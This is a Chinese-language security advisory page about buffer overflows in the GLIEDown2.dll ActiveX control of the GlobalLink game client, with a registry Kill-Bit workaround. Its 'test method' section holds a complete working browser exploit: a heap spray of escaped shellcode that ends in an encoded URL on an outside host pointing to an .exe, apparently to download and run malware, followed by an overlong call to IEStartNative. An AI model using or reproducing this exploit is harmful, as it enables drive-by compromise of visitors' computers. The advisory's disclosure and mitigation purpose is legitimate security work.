首页 -> 安全研究

安全研究

安全漏洞
联众世界GLIEDown2.dll Active控件多个缓冲区溢出漏洞

发布日期:2008-05-07
更新日期:2008-06-03

受影响系统:
GlobalLink GlobalLink 2.8.1.2 beta
描述:
BUGTRAQ  ID: 29118,29446

联众世界是在中国非常流行的在线游戏网站。

联众世界的游戏大厅主程序GLWorld所安装的GLIEDown2.dll ActiveX控件(CLSID:F917534D-535B-416B-8E8F-0C04756C31A8)没有正确地处理对IEStart()、IEStartNative()方式以及ServerList、GameInfo和GruopName属性的输入参数。如果用户受骗访问了恶意网页并向这些方式传送了特制参数的话,就可能触发堆溢出或栈溢出,导致在用户系统上执行任意指令。

利用此漏洞进行挂马的0day攻击已经出现。

<*来源:知道安全 (http://www.scanw.com/blog)
  
  链接:http://www.scanw.com/blog/archives/175
        http://secunia.com/advisories/30469/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

CLSID: F917534D-535B-416B-8E8F-0C04756C31A8  

<script>
document.writeln("<html>");
document.writeln("<object classid=\"clsid:F917534D-535B-416B-8E8F-0C04756C31A8\" id=\'target\'><\/object>");
document.writeln("<body>");
document.writeln("<SCRIPT language=\"JavaScript\">");
document.writeln("var cikeqq575562708 = \"%u9090%u6090\" +");
document.writeln("\"%u17eb%u645e%u30a1%u0000\" +");
document.writeln("\"%u0500%u0800%u0000%uf88b%u00b9%u0004%uf300%uffa4%ue8e0\" +");
document.writeln("\"%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad\" +");
document.writeln("\"%u0870%uec81%u0200%u0000%uec8b%ue8bb%u020f%u8b00%u8503\" +");
document.writeln("\"%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d\" +");
document.writeln("\"%u6856%ufe98%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e\" +");
document.writeln("\"%uec0e%ua3e8%u0000%u8900%u0445%u6856%u79c1%ub8e5%u95e8\" +");
document.writeln("\"%u0000%u8900%u1c45%u6856%uc61b%u7946%u87e8%u0000%u8900\" +");
document.writeln("\"%u1045%u6856%ufcaa%u7c0d%u79e8%u0000%u8900%u0845%u6856\" +");
document.writeln("\"%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%u8900\" +");
document.writeln("\"%u3303%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00\" +");
document.writeln("\"%u285d%uff53%u0455%u6850%u1a36%u702f%u3fe8%u0000%u8900\" +");
document.writeln("\"%u2445%u7f6a%u5d8d%u5328%u55ff%uc71c%u0544%u5c28%u652e\" +");
document.writeln("\"%uc778%u0544%u652c%u0000%u5600%u8d56%u287d%uff57%u2075\" +");
document.writeln("\"%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%uc481%u0200\" +");
document.writeln("\"%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b\" +");
document.writeln("\"%u560c%u738b%u8b3c%u1e74%u0378%u56f3%u768b%u0320%u33f3\" +");
document.writeln("\"%u49c9%uad41%uc303%u3356%u0ff6%u10be%uf23a%u0874%ucec1\" +");
document.writeln("\"%u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5%ueb8b%u5a8b%u0324\" +");
document.writeln("\"%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5ec5%u595b\" +");
document.writeln("\"%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100\" +");
document.writeln("\"%u0000%ua4f3%uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07\" +");
document.writeln("\"%u6474%uc76c%u0447%u006c%u0000%uff57%u0455%u4589%uc724\" +");
document.writeln("\"%u5207%u6c74%uc741%u0447%u6c6c%u636f%u47c7%u6108%u6574\" +");
document.writeln("\"%uc748%u0c47%u6165%u0070%u5057%u55ff%u8b08%ub8f0%u0fe4\" +");
document.writeln("\"%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700\" +");
document.writeln("\"%u55ff%u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474\" +");
document.writeln("\"%uf9e2%u12eb%u348d%u5508%u406a%u046a%uff56%u1055%u06c7\" +");
document.writeln("\"%u0c80%u0002%uc481%u0100%u0000%ue8c3%uff69%uffff%u048b\" +");
document.writeln("\"%u5324%u5251%u5756%uecb9%u020f%u8b00%u8519%u75db%u3350\" +");
document.writeln("\"%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500%u833e\" +");
document.writeln("\"%u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f\" +");
document.writeln("\"%u8318%u6afb%u2575%uc083%u8b04%ub830%u0fe0%u0002%u0068\" +");
document.writeln("\"%u0000%u6801%u1000%u0000%u006a%u10ff%u0689%u4489%u1824\" +");
document.writeln("\"%uecb9%u020f%uff00%u5f01%u5a5e%u5b59%ue4b8%u020f%uff00\" +");
document.writeln("\"%ue820%ufdda%uffff\" +");
document.writeln("\"%u7468%u7074%u2f3a%u772f%u7777%u622e%u6961%u7564%u6f75%u632e%u2f6e%u3231%u2f33%u6b6f%u652e%u6578\";");
document.writeln("var shellcode = unescape(cikeqq575562708);");
document.writeln("var nop = \"tmp9090tmp9090\";");
document.writeln("var Cike = unescape(nop.replace(\/tmp\/g,\"%u\"));");
document.writeln("while (Cike.length<224) Cike+=Cike;");
document.writeln("fillvcbcv = Cike.substring(0, 224);");
document.writeln("vcbcv = Cike.substring(0, Cike.length-224);");
document.writeln("while(vcbcv.length+224<0x40000) vcbcv = vcbcv+vcbcv+fillvcbcv;");
document.writeln("gdfgdh = new Array();");
document.writeln("for (x=0; x<300; x++) gdfgdh[x] = vcbcv +shellcode;");
document.writeln("var hellohack = \'\';");
document.writeln("while (hellohack.length < 600) hellohack+=\'\\x0a\\x0a\\x0a\\x0a\';");
document.writeln("target[\"\\x49\\x45\\x53\\x74\\x61\\x72\\x74\\x4e\\x61\\x74\\x69\\x76\\x65\"](hellohack,\"CikeVipWm\",\"fuckyou\");");
document.writeln("<\/script>");
document.writeln("<\/body>");
document.writeln("<\/html>");
document.writeln("")
</script>

建议:
临时解决方法:

* 为有漏洞的控件设置Kill-Bit:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F917534D-535B-416B-8E8F-0C04756C31A8}]
“Compatibility Flags”=dword:00000400

厂商补丁:

GlobalLink
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ourgame.com/

浏览次数:5821
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障